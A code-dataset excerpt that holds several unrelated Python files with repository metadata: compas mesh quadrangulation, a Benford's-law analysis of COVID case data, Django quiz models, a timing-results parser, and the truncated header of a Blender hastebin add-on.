from compas.geometry import discrete_coons_patch
from ..utilities import list_split
def quadrangulate_mesh(mesh, sources):
"""Quadrangulate the faces of a mesh by adding edges from vertex sources.
    Parameters
    ----------
    mesh : Mesh
        A mesh to quadrangulate.
    sources : list
        A list of vertex keys to use as sources to add edges for quadrangulation.
References
----------
.. [1] Oval et al., *Feature-based Topology Finding of Patterns for Shell Structures*. Automation in Construction. 2019.
"""
sources_to_visit = sources[:]
count = 1000
while sources_to_visit and count:
count -= 1
vkey = sources_to_visit.pop()
for fkey in mesh.vertex_faces(vkey):
face_vertices = mesh.face_vertices(fkey)[:]
if len(face_vertices) != 4:
new_sources = quadrangulate_face(mesh, fkey, sources)
for vkey in face_vertices:
if vkey in sources_to_visit:
sources_to_visit.remove(vkey)
sources += new_sources
sources_to_visit += new_sources
def quadrangulate_face(mesh, fkey, sources):
face_vertices = mesh.face_vertices(fkey)[:]
# differentiate sources and non sources
sources = [vkey for vkey in face_vertices if vkey in sources]
non_sources = [vkey for vkey in face_vertices if vkey not in sources]
new_sources = []
if len(non_sources) == 4:
a, b, c, d = non_sources
ab, bc, cd, da = list_split(face_vertices + face_vertices[:1], [face_vertices.index(vkey) for vkey in non_sources])
# add missing vertices
for i, edges in enumerate([[ab, cd], [bc, da]]):
uv, wx = edges
# all cases
if len(uv) == len(wx):
# no subdivision needed
continue
elif len(uv) == 2 and len(wx) != 2:
# subdivide uv
n = len(wx) - len(uv) + 1
new_points = [mesh.edge_point(uv[0], uv[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
ab = [uv[0]] + new_vertices + [uv[-1]]
elif i == 1:
bc = [uv[0]] + new_vertices + [uv[-1]]
update_adjacent_face(mesh, uv[1], uv[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) == 2:
# subdivide wx
n = len(uv) - len(wx) + 1
new_points = [mesh.edge_point(wx[0], wx[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
cd = [wx[0]] + new_vertices + [wx[-1]]
elif i == 1:
da = [wx[0]] + new_vertices + [wx[-1]]
# update adjacent faces
update_adjacent_face(mesh, wx[1], wx[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) != 2 and len(uv) != len(wx):
pass
# apply Takayama's work
# print('not implemented yet')
mesh.delete_face(fkey)
discrete_coons_patch_mesh(mesh, ab, bc, list(reversed(cd)), list(reversed(da)))
else:
pass
return new_sources
def discrete_coons_patch_mesh(mesh, ab, bc, dc, ad):
ab_xyz = [mesh.vertex_coordinates(vkey) for vkey in ab]
bc_xyz = [mesh.vertex_coordinates(vkey) for vkey in bc]
dc_xyz = [mesh.vertex_coordinates(vkey) for vkey in dc]
ad_xyz = [mesh.vertex_coordinates(vkey) for vkey in ad]
coons_vertices, coons_face_vertices = discrete_coons_patch(ab_xyz, bc_xyz, dc_xyz, ad_xyz)
n = len(ab)
m = len(bc)
vertex_index_map = {}
for i, vkey in enumerate(ad):
vertex_index_map[i] = vkey
for i, vkey in enumerate(bc):
vertex_index_map[m * (n - 1) + i] = vkey
for i, vkey in enumerate(ab):
vertex_index_map[i * m] = vkey
for i, vkey in enumerate(dc):
vertex_index_map[m - 1 + i * m] = vkey
max_vkey = max(list(mesh.vertices()))
for i, vertex in enumerate(coons_vertices):
if i not in vertex_index_map:
max_vkey += 1
vertex_index_map[i] = max_vkey
mesh.add_vertex(max_vkey, attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], vertex)})
for face in coons_face_vertices:
mesh.add_face(list(reversed([vertex_index_map[vkey] for vkey in face])))
def update_adjacent_face(mesh, u, v, vertices_uv):
fkey = mesh.halfedge[u][v]
if fkey is not None:
face_vertices = mesh.face_vertices(fkey)[:]
i = face_vertices.index(v)
for vkey in reversed(vertices_uv):
face_vertices.insert(i, vkey)
mesh.delete_face(fkey)
mesh.add_face(face_vertices, fkey)
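A standalone sketch of the compas discrete_coons_patch call the helper above wraps; the boundary polylines are made up, and the printed sizes follow from the 3x3 boundary grid.
from compas.geometry import discrete_coons_patch

ab = [[0, 0, 0], [0, 1, 0], [0, 2, 0]]   # four consistent boundary polylines
bc = [[0, 2, 0], [1, 2, 0], [2, 2, 0]]
dc = [[2, 0, 0], [2, 1, 0], [2, 2, 0]]
ad = [[0, 0, 0], [1, 0, 0], [2, 0, 0]]
vertices, faces = discrete_coons_patch(ab, bc, dc, ad)
print(len(vertices), len(faces))         # 9 vertices, 4 quad faces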
| 35.369128
| 142
| 0.579317
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from compas.geometry import discrete_coons_patch
from ..utilities import list_split
def quadrangulate_mesh(mesh, sources):
sources_to_visit = sources[:]
count = 1000
while sources_to_visit and count:
count -= 1
vkey = sources_to_visit.pop()
for fkey in mesh.vertex_faces(vkey):
face_vertices = mesh.face_vertices(fkey)[:]
if len(face_vertices) != 4:
new_sources = quadrangulate_face(mesh, fkey, sources)
for vkey in face_vertices:
if vkey in sources_to_visit:
sources_to_visit.remove(vkey)
sources += new_sources
sources_to_visit += new_sources
def quadrangulate_face(mesh, fkey, sources):
face_vertices = mesh.face_vertices(fkey)[:]
sources = [vkey for vkey in face_vertices if vkey in sources]
non_sources = [vkey for vkey in face_vertices if vkey not in sources]
new_sources = []
if len(non_sources) == 4:
a, b, c, d = non_sources
ab, bc, cd, da = list_split(face_vertices + face_vertices[:1], [face_vertices.index(vkey) for vkey in non_sources])
for i, edges in enumerate([[ab, cd], [bc, da]]):
uv, wx = edges
if len(uv) == len(wx):
continue
elif len(uv) == 2 and len(wx) != 2:
n = len(wx) - len(uv) + 1
new_points = [mesh.edge_point(uv[0], uv[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
ab = [uv[0]] + new_vertices + [uv[-1]]
elif i == 1:
bc = [uv[0]] + new_vertices + [uv[-1]]
update_adjacent_face(mesh, uv[1], uv[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) == 2:
n = len(uv) - len(wx) + 1
new_points = [mesh.edge_point(wx[0], wx[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
cd = [wx[0]] + new_vertices + [wx[-1]]
elif i == 1:
da = [wx[0]] + new_vertices + [wx[-1]]
update_adjacent_face(mesh, wx[1], wx[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) != 2 and len(uv) != len(wx):
pass
# print('not implemented yet')
mesh.delete_face(fkey)
discrete_coons_patch_mesh(mesh, ab, bc, list(reversed(cd)), list(reversed(da)))
else:
pass
return new_sources
def discrete_coons_patch_mesh(mesh, ab, bc, dc, ad):
ab_xyz = [mesh.vertex_coordinates(vkey) for vkey in ab]
bc_xyz = [mesh.vertex_coordinates(vkey) for vkey in bc]
dc_xyz = [mesh.vertex_coordinates(vkey) for vkey in dc]
ad_xyz = [mesh.vertex_coordinates(vkey) for vkey in ad]
coons_vertices, coons_face_vertices = discrete_coons_patch(ab_xyz, bc_xyz, dc_xyz, ad_xyz)
n = len(ab)
m = len(bc)
vertex_index_map = {}
for i, vkey in enumerate(ad):
vertex_index_map[i] = vkey
for i, vkey in enumerate(bc):
vertex_index_map[m * (n - 1) + i] = vkey
for i, vkey in enumerate(ab):
vertex_index_map[i * m] = vkey
for i, vkey in enumerate(dc):
vertex_index_map[m - 1 + i * m] = vkey
max_vkey = max(list(mesh.vertices()))
for i, vertex in enumerate(coons_vertices):
if i not in vertex_index_map:
max_vkey += 1
vertex_index_map[i] = max_vkey
mesh.add_vertex(max_vkey, attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], vertex)})
for face in coons_face_vertices:
mesh.add_face(list(reversed([vertex_index_map[vkey] for vkey in face])))
def update_adjacent_face(mesh, u, v, vertices_uv):
fkey = mesh.halfedge[u][v]
if fkey is not None:
face_vertices = mesh.face_vertices(fkey)[:]
i = face_vertices.index(v)
for vkey in reversed(vertices_uv):
face_vertices.insert(i, vkey)
mesh.delete_face(fkey)
mesh.add_face(face_vertices, fkey)
| true
| true
|
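For context, the quadrangulation code above bottoms out in compas' discrete Coons patch. A minimal standalone sketch of that primitive, assuming compas is installed (the boundary points below are illustrative, not taken from the code):

from compas.geometry import discrete_coons_patch

# Four boundary polylines of a unit square, sharing corner points:
# ab runs a->b, bc runs b->c, dc runs d->c, ad runs a->d.
ab = [[0.0, 0.0, 0.0], [0.5, 0.0, 0.0], [1.0, 0.0, 0.0]]
bc = [[1.0, 0.0, 0.0], [1.0, 0.5, 0.0], [1.0, 1.0, 0.0]]
dc = [[0.0, 1.0, 0.0], [0.5, 1.0, 0.0], [1.0, 1.0, 0.0]]
ad = [[0.0, 0.0, 0.0], [0.0, 0.5, 0.0], [0.0, 1.0, 0.0]]

vertices, faces = discrete_coons_patch(ab, bc, dc, ad)
print(len(vertices), len(faces))  # expect a 3x3 grid: 9 vertices, 4 quad faces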
1c40d7922ee0e9af71035e7e7719d5b089de3727
| 5,468
|
py
|
Python
|
benford.py
|
EivindFa/benfords_law
|
6f2a0ab3f63d21b2caeef8f54922972b10d2b1b7
|
[
"MIT"
] | null | null | null |
benford.py
|
EivindFa/benfords_law
|
6f2a0ab3f63d21b2caeef8f54922972b10d2b1b7
|
[
"MIT"
] | null | null | null |
benford.py
|
EivindFa/benfords_law
|
6f2a0ab3f63d21b2caeef8f54922972b10d2b1b7
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
from scipy import stats
# data source: https://ourworldindata.org/coronavirus-source-data
def setup(csv_filename, country):
df = pd.read_csv(csv_filename)
df = df.loc[: , ["location", "date", "new_cases" ]]
df = df[df["location"] == country]
# Data prep
df = df[df["new_cases"].notna()] # remove not a number-rows
df = df[df["new_cases"] > 0]
df.drop_duplicates()
print(df.head())
return df
def statistics(df):
print("Dataset size", len(df["new_cases"].tolist()))
def calculate_first_digit(df):
new_cases = df["new_cases"]
first_digit = []
for row in df["new_cases"]: # get first digit
try:
first_digit.append(int(str(row)[:1]))
except:
first_digit.append(0)
print(row)
df["first_digit"] = first_digit
df = df.drop(df[df.first_digit <= 0].index) # drop rows with 0 values
n = len(df["first_digit"].tolist())
count_first_digit = df["first_digit"].value_counts(sort=False)#count number of 1's, 2's, 3's and so on
count_first_digit.to_frame().to_numpy()
total_count = count_first_digit.sum() # number of numbers in list. Equal to len(df["first_digit"].tolist())
percentage = []
for elem in count_first_digit:
p = float("{:.4f}".format( elem / total_count))
percentage.append(p)
x = np.linspace(1,9,9)
percentage = dict(zip(x, percentage))
return df, percentage
def calculate_first_two_digits(df):
first_two = []
for row in df["new_cases"]:
temp_int = int(row*10)
first_two.append(int(str(temp_int)[:2]))
df["first_two"] = first_two
count_first_two = df["first_two"].value_counts(sort=False)[1:]
print(count_first_two)
count_first_two.to_numpy()
total_count = count_first_two.sum()
percentage = []
for elem in count_first_two:
percentage.append(float("{:.4f}".format( elem / total_count)))
return df, percentage
def plot_figure(percentage, perfect_benford):
_x = np.linspace(1, 9, 9)
    plt.plot(_x, percentage, label="first digit benford")  # calculated percentage
plt.plot(_x, list(perfect_benford.values()), label="perfect benford")
plt.xlabel("Digits")
plt.ylabel("Percentage")
plt.legend()
plt.show()
def get_perfect_benford():
x = np.linspace(1,9,9)
y = [0.31, 0.176, 0.125, 0.097,0.079, 0.067, 0.058, 0.051, 0.046]
return dict(zip(x,y))
def pearson_coefficient(list_a, list_b):
assert (len(list_a) != 0)
assert (len(list_b) != 0) # list b is perfect benford
sum_a = sum(list_a)
sum_b = sum(list_b)
mean_a = float(sum_a / len(list_a))
mean_b = float(sum_b / len(list_b))
list_mean_a = [(x - mean_a) for x in list_a]
list_mean_b = [(y - mean_b) for y in list_b]
numerator = sum(x * y for x,y in zip(list_mean_a, list_mean_b))
denominator = math.sqrt(sum(x*x for x in list_mean_a) * sum(y * y for y in list_mean_b))
if (denominator != 0):
p_value = numerator / denominator
else:
p_value = 0
print("------ Pearson coefficient --------")
print(p_value)
return p_value
def mantissa_arc_test(list_a):
"""
The mantissa arc test.
    :param list_a: df["new_cases"]
:return: p-value and a plot
"""
x_coordinates = [(math.cos(2*math.pi * (math.log10(x) % 1))) for x in list_a] # abscissa - x-coordinate for the mantissa
y_coordinates = [(math.sin(2*math.pi * (math.log10(x) % 1))) for x in list_a] # ordinate
x_nominator = sum(math.cos(2*math.pi * (math.log10(x) % 1)) for x in list_a)
y_nominator = sum(math.sin(2*math.pi * (math.log10(x) % 1)) for x in list_a)
x_coordinate = x_nominator / len(list_a) # Center of mass
y_coordinate = y_nominator / len(list_a) # Center of mass
L_squared = (x_coordinate)**2 + (y_coordinate)**2
p_value = 1 - math.exp(-L_squared * len(list_a))
print("--------- p-value ---------")
print(p_value)
''' Plotting '''
plt.scatter(x_coordinates, y_coordinates)
plt.plot(x_coordinate, y_coordinate, 'o', color="red") # center of mass
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.show()
### TODO: implement chi-squared
def chi_squared(df, perfect_benford):
'''
#observed, expected ....
H0: status_que_hypothesis
'''
sample_size = len(df["new_cases"].tolist())
benford_distribution = [sample_size*x for x in perfect_benford] # expected distribution
count_first_digit = df["first_digit"].value_counts(sort=False)
residual_squared = [math.pow(x-y, 2) / y for x,y in zip(count_first_digit, benford_distribution)]
degrees_of_freedom = (9-1)*(2-1)
    p_value = stats.chi2.sf(sum(residual_squared), degrees_of_freedom)  # sf, not pdf: the p-value is the upper-tail probability
print("chi squared p-value: ",p_value)
#print("residual", residual)
#print(benford_distribution)
#print("Not implemented yet")
def main():
df = setup("owid-covid-data.csv","Belgium") #csv_filename, country
statistics(df) # Get info about the dataset
df, percentage = calculate_first_digit(df)
print(df.head())
chi_squared(df, list(get_perfect_benford().values()))
    pearson = pearson_coefficient(list(percentage.values()), list(get_perfect_benford().values()))  # pass the probability values, not the dict (iterating a dict yields its keys)
mantissa_arc_test(df["new_cases"].tolist())
plot_figure(list(percentage.values()), get_perfect_benford())
if __name__ == "__main__":
main()
| 35.738562
| 124
| 0.647952
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
from scipy import stats
def setup(csv_filename, country):
df = pd.read_csv(csv_filename)
df = df.loc[: , ["location", "date", "new_cases" ]]
df = df[df["location"] == country]
df = df[df["new_cases"].notna()]
df = df[df["new_cases"] > 0]
df.drop_duplicates()
print(df.head())
return df
def statistics(df):
print("Dataset size", len(df["new_cases"].tolist()))
def calculate_first_digit(df):
new_cases = df["new_cases"]
first_digit = []
for row in df["new_cases"]:
try:
first_digit.append(int(str(row)[:1]))
except:
first_digit.append(0)
print(row)
df["first_digit"] = first_digit
df = df.drop(df[df.first_digit <= 0].index)
n = len(df["first_digit"].tolist())
count_first_digit = df["first_digit"].value_counts(sort=False)
count_first_digit.to_frame().to_numpy()
total_count = count_first_digit.sum() # number of numbers in list. Equal to len(df["first_digit"].tolist())
percentage = []
for elem in count_first_digit:
p = float("{:.4f}".format( elem / total_count))
percentage.append(p)
x = np.linspace(1,9,9)
percentage = dict(zip(x, percentage))
return df, percentage
def calculate_first_two_digits(df):
first_two = []
for row in df["new_cases"]:
temp_int = int(row*10)
first_two.append(int(str(temp_int)[:2]))
df["first_two"] = first_two
count_first_two = df["first_two"].value_counts(sort=False)[1:]
print(count_first_two)
count_first_two.to_numpy()
total_count = count_first_two.sum()
percentage = []
for elem in count_first_two:
percentage.append(float("{:.4f}".format( elem / total_count)))
return df, percentage
def plot_figure(percentage, perfect_benford):
_x = np.linspace(1, 9, 9)
    plt.plot(_x, percentage, label="first digit benford")  # calculated percentage
plt.plot(_x, list(perfect_benford.values()), label="perfect benford")
plt.xlabel("Digits")
plt.ylabel("Percentage")
plt.legend()
plt.show()
def get_perfect_benford():
x = np.linspace(1,9,9)
y = [0.31, 0.176, 0.125, 0.097,0.079, 0.067, 0.058, 0.051, 0.046]
return dict(zip(x,y))
def pearson_coefficient(list_a, list_b):
assert (len(list_a) != 0)
assert (len(list_b) != 0) # list b is perfect benford
sum_a = sum(list_a)
sum_b = sum(list_b)
mean_a = float(sum_a / len(list_a))
mean_b = float(sum_b / len(list_b))
list_mean_a = [(x - mean_a) for x in list_a]
list_mean_b = [(y - mean_b) for y in list_b]
numerator = sum(x * y for x,y in zip(list_mean_a, list_mean_b))
denominator = math.sqrt(sum(x*x for x in list_mean_a) * sum(y * y for y in list_mean_b))
if (denominator != 0):
p_value = numerator / denominator
else:
p_value = 0
print("------ Pearson coefficient --------")
print(p_value)
return p_value
def mantissa_arc_test(list_a):
x_coordinates = [(math.cos(2*math.pi * (math.log10(x) % 1))) for x in list_a] # abscissa - x-coordinate for the mantissa
y_coordinates = [(math.sin(2*math.pi * (math.log10(x) % 1))) for x in list_a] # ordinate
x_nominator = sum(math.cos(2*math.pi * (math.log10(x) % 1)) for x in list_a)
y_nominator = sum(math.sin(2*math.pi * (math.log10(x) % 1)) for x in list_a)
x_coordinate = x_nominator / len(list_a) # Center of mass
y_coordinate = y_nominator / len(list_a) # Center of mass
L_squared = (x_coordinate)**2 + (y_coordinate)**2
p_value = 1 - math.exp(-L_squared * len(list_a))
print("--------- p-value ---------")
print(p_value)
plt.scatter(x_coordinates, y_coordinates)
plt.plot(x_coordinate, y_coordinate, 'o', color="red") # center of mass
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.show()
### TODO: implement chi-squared
def chi_squared(df, perfect_benford):
sample_size = len(df["new_cases"].tolist())
benford_distribution = [sample_size*x for x in perfect_benford] # expected distribution
count_first_digit = df["first_digit"].value_counts(sort=False)
residual_squared = [math.pow(x-y, 2) / y for x,y in zip(count_first_digit, benford_distribution)]
degrees_of_freedom = (9-1)*(2-1)
    p_value = stats.chi2.sf(sum(residual_squared), degrees_of_freedom)
print("chi squared p-value: ",p_value)
#print("residual", residual)
#print(benford_distribution)
#print("Not implemented yet")
def main():
df = setup("owid-covid-data.csv","Belgium") #csv_filename, country
statistics(df) # Get info about the dataset
df, percentage = calculate_first_digit(df)
print(df.head())
chi_squared(df, list(get_perfect_benford().values()))
    pearson = pearson_coefficient(list(percentage.values()), list(get_perfect_benford().values()))
mantissa_arc_test(df["new_cases"].tolist())
plot_figure(list(percentage.values()), get_perfect_benford())
if __name__ == "__main__":
main()
| true
| true
|
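The hard-coded "perfect Benford" percentages in get_perfect_benford above are rounded values of the first-digit law P(d) = log10(1 + 1/d). A minimal sketch deriving them directly (note the script rounds P(1) = 0.301 up to 0.31):

import math

# First-digit law: P(d) = log10(1 + 1/d) for d = 1..9.
benford = {d: math.log10(1 + 1 / d) for d in range(1, 10)}
for d, p in benford.items():
    print(d, round(p, 3))  # 1 -> 0.301, 2 -> 0.176, ..., 9 -> 0.046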
1c40d79baf9dc72b1930e86aa0624e64fd126af1
| 3,557
|
py
|
Python
|
createaquiz/quiz/models.py
|
ranajaydas/CreateAQuiz
|
d83ec4aa08b61ffb2f044c3d0cc3accf81e826b7
|
[
"MIT"
] | null | null | null |
createaquiz/quiz/models.py
|
ranajaydas/CreateAQuiz
|
d83ec4aa08b61ffb2f044c3d0cc3accf81e826b7
|
[
"MIT"
] | 10
|
2021-03-19T08:08:58.000Z
|
2022-03-12T00:12:36.000Z
|
createaquiz/quiz/models.py
|
ranajaydas/CreateAQuiz
|
d83ec4aa08b61ffb2f044c3d0cc3accf81e826b7
|
[
"MIT"
] | null | null | null |
from random import shuffle
from django.db import models
from django.shortcuts import reverse
from django.conf import settings
from core.utils import ImageResizeUploadS3
class CustomModel:
"""Common Model inherited by other models."""
def get_model(self):
return self.__class__.__name__
class Tag(CustomModel, models.Model):
name = models.CharField(max_length=31, unique=True)
slug = models.SlugField(max_length=31, unique=True, help_text='A label for URL config')
class Meta:
ordering = ['name']
def __str__(self):
return self.name.title()
def get_absolute_url(self):
return reverse('tag_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('tag_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('tag_delete', kwargs={'slug': self.slug})
def get_parent_url(self):
return reverse('tag_list')
class Quiz(ImageResizeUploadS3, CustomModel, models.Model):
name = models.CharField(max_length=63, db_index=True)
slug = models.SlugField(max_length=63, unique=True, help_text='A label for URL config')
description = models.TextField()
pub_date = models.DateField('date published', auto_now_add=True)
tags = models.ManyToManyField(Tag, blank=True)
author = models.ForeignKey(settings.AUTH_USER_MODEL,
                               on_delete=models.SET_NULL, null=True)  # if the user is deleted, their quizzes are not deleted
image = models.ImageField(null=True, blank=True, default=None, upload_to='quiz_headers')
# Maximum size of image allowed without resizing (in pixels)
max_image_size = (800, 800)
class Meta:
ordering = ['name']
get_latest_by = 'pub_date'
verbose_name_plural = 'Quizzes'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('quiz_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('quiz_delete', kwargs={'slug': self.slug})
def get_start_url(self):
return reverse('quiz_start', kwargs={'slug': self.slug})
def create_question_url(self):
return reverse('quiz_question_create', kwargs={'quiz_slug': self.slug})
class Question(CustomModel, models.Model):
question_text = models.CharField(max_length=200)
correct_choice = models.CharField(max_length=63)
incorrect_choice_1 = models.CharField(max_length=63)
incorrect_choice_2 = models.CharField(max_length=63)
incorrect_choice_3 = models.CharField(max_length=63)
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
class Meta:
unique_together = ('question_text', 'quiz') # The same quiz can't have the same questions
def __str__(self):
return self.question_text
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.quiz.slug})
def get_update_url(self):
return reverse('quiz_question_update', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_delete_url(self):
return reverse('quiz_question_delete', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_random_choices(self):
choice_list = [self.correct_choice,
self.incorrect_choice_1,
self.incorrect_choice_2,
self.incorrect_choice_3]
shuffle(choice_list)
return choice_list
| 34.201923
| 111
| 0.681473
|
from random import shuffle
from django.db import models
from django.shortcuts import reverse
from django.conf import settings
from core.utils import ImageResizeUploadS3
class CustomModel:
def get_model(self):
return self.__class__.__name__
class Tag(CustomModel, models.Model):
name = models.CharField(max_length=31, unique=True)
slug = models.SlugField(max_length=31, unique=True, help_text='A label for URL config')
class Meta:
ordering = ['name']
def __str__(self):
return self.name.title()
def get_absolute_url(self):
return reverse('tag_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('tag_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('tag_delete', kwargs={'slug': self.slug})
def get_parent_url(self):
return reverse('tag_list')
class Quiz(ImageResizeUploadS3, CustomModel, models.Model):
name = models.CharField(max_length=63, db_index=True)
slug = models.SlugField(max_length=63, unique=True, help_text='A label for URL config')
description = models.TextField()
pub_date = models.DateField('date published', auto_now_add=True)
tags = models.ManyToManyField(Tag, blank=True)
author = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL, null=True)
image = models.ImageField(null=True, blank=True, default=None, upload_to='quiz_headers')
max_image_size = (800, 800)
class Meta:
ordering = ['name']
get_latest_by = 'pub_date'
verbose_name_plural = 'Quizzes'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('quiz_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('quiz_delete', kwargs={'slug': self.slug})
def get_start_url(self):
return reverse('quiz_start', kwargs={'slug': self.slug})
def create_question_url(self):
return reverse('quiz_question_create', kwargs={'quiz_slug': self.slug})
class Question(CustomModel, models.Model):
question_text = models.CharField(max_length=200)
correct_choice = models.CharField(max_length=63)
incorrect_choice_1 = models.CharField(max_length=63)
incorrect_choice_2 = models.CharField(max_length=63)
incorrect_choice_3 = models.CharField(max_length=63)
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
class Meta:
unique_together = ('question_text', 'quiz')
def __str__(self):
return self.question_text
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.quiz.slug})
def get_update_url(self):
return reverse('quiz_question_update', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_delete_url(self):
return reverse('quiz_question_delete', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_random_choices(self):
choice_list = [self.correct_choice,
self.incorrect_choice_1,
self.incorrect_choice_2,
self.incorrect_choice_3]
shuffle(choice_list)
return choice_list
| true
| true
|
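The only non-boilerplate logic in these models is get_random_choices. A minimal framework-free sketch of the same pattern (the data below is illustrative, not from the app):

from random import shuffle

def random_choices(correct, distractors):
    choices = [correct, *distractors]
    shuffle(choices)  # shuffles in place, so build the combined list first
    return choices

print(random_choices("Paris", ["London", "Berlin", "Madrid"]))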
1c40d837af0d413b7a0f8ca344d09150e56e4904
| 1,007
|
py
|
Python
|
PerformanceMetricsScript/ApplicationLevelPerformanceMetricsParsing.py
|
ShivKushwah/PSec-Anonymous
|
6561e8e753455731fc5a3ae80bc1007982131880
|
[
"MIT"
] | 4
|
2020-04-28T03:35:15.000Z
|
2021-12-08T08:19:52.000Z
|
PerformanceMetricsScript/ApplicationLevelPerformanceMetricsParsing.py
|
ShivKushwah/PSec
|
22b1c066ac0c2667713ce5f6c40f23406ce782f5
|
[
"MIT"
] | 1
|
2019-09-15T19:42:14.000Z
|
2019-09-15T19:42:14.000Z
|
PerformanceMetricsScript/ApplicationLevelPerformanceMetricsParsing.py
|
ShivKushwah/PSec
|
22b1c066ac0c2667713ce5f6c40f23406ce782f5
|
[
"MIT"
] | null | null | null |
import re
import subprocess
import time
import json
import statistics
import time
import os
import sys
search_lst1 = ['MEASURE BASELINE START']
search_lst2 = ['MEASURE BASELINE END']
id_lst = ['MEASURE BASELINE']
with open('BaselineCacheHost1.txt') as json_file:
data1 = json.load(json_file)
with open('BaselineCacheHost2.txt') as json_file:
data2 = json.load(json_file)
#merge 2 dictionaries into 1
data1.update(data2)
data_dict = {}
#Populate data_dict
for i in range(len(search_lst1)):
lst1 = data1[search_lst1[i]]
lst2 = data1[search_lst2[i]]
data_dict[id_lst[i]] = [end - start for end, start in zip(lst2, lst1)]
with open('BaselineCacheFinalResults.txt', 'w') as file:
file.write(json.dumps(data_dict)) # use `json.loads` to do the reverse
for key in data_dict.keys():
lst = data_dict[key]
print(key)
print('Mean:')
print(float(sum(lst))/len(lst))
print('Standard Deviation:')
res = statistics.pstdev(lst)
print(res)
print(data_dict)
| 23.418605
| 78
| 0.704071
|
import re
import subprocess
import time
import json
import statistics
import time
import os
import sys
search_lst1 = ['MEASURE BASELINE START']
search_lst2 = ['MEASURE BASELINE END']
id_lst = ['MEASURE BASELINE']
with open('BaselineCacheHost1.txt') as json_file:
data1 = json.load(json_file)
with open('BaselineCacheHost2.txt') as json_file:
data2 = json.load(json_file)
data1.update(data2)
data_dict = {}
for i in range(len(search_lst1)):
lst1 = data1[search_lst1[i]]
lst2 = data1[search_lst2[i]]
data_dict[id_lst[i]] = [end - start for end, start in zip(lst2, lst1)]
with open('BaselineCacheFinalResults.txt', 'w') as file:
file.write(json.dumps(data_dict))
for key in data_dict.keys():
lst = data_dict[key]
print(key)
print('Mean:')
print(float(sum(lst))/len(lst))
print('Standard Deviation:')
res = statistics.pstdev(lst)
print(res)
print(data_dict)
| true
| true
|
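The core of the script above is pairing START/END timestamp lists into elementwise durations and summarizing them. A minimal sketch with hypothetical sample values:

import statistics

starts = [10.0, 12.5, 14.0]  # hypothetical epoch-second timestamps
ends = [10.4, 13.1, 14.2]
durations = [end - start for end, start in zip(ends, starts)]

print(durations)                        # approximately [0.4, 0.6, 0.2]
print(sum(durations) / len(durations))  # mean
print(statistics.pstdev(durations))     # population standard deviation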
1c40d8498f142620bf4e4ba3383c78937ded2868
| 5,514
|
py
|
Python
|
bpy_lambda/2.78/scripts/addons_contrib/text_editor_hastebin.py
|
resultant-gamedev/bpy_lambda
|
c8cf46c10c69e74a0892b621d76c62edaa5b04bc
|
[
"MIT"
] | null | null | null |
bpy_lambda/2.78/scripts/addons_contrib/text_editor_hastebin.py
|
resultant-gamedev/bpy_lambda
|
c8cf46c10c69e74a0892b621d76c62edaa5b04bc
|
[
"MIT"
] | null | null | null |
bpy_lambda/2.78/scripts/addons_contrib/text_editor_hastebin.py
|
resultant-gamedev/bpy_lambda
|
c8cf46c10c69e74a0892b621d76c62edaa5b04bc
|
[
"MIT"
] | 1
|
2019-11-24T18:43:42.000Z
|
2019-11-24T18:43:42.000Z
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "hastebin",
"author": "Dalai Felinto (dfelinto)",
"version": (0, 8),
"blender": (2, 78, 0),
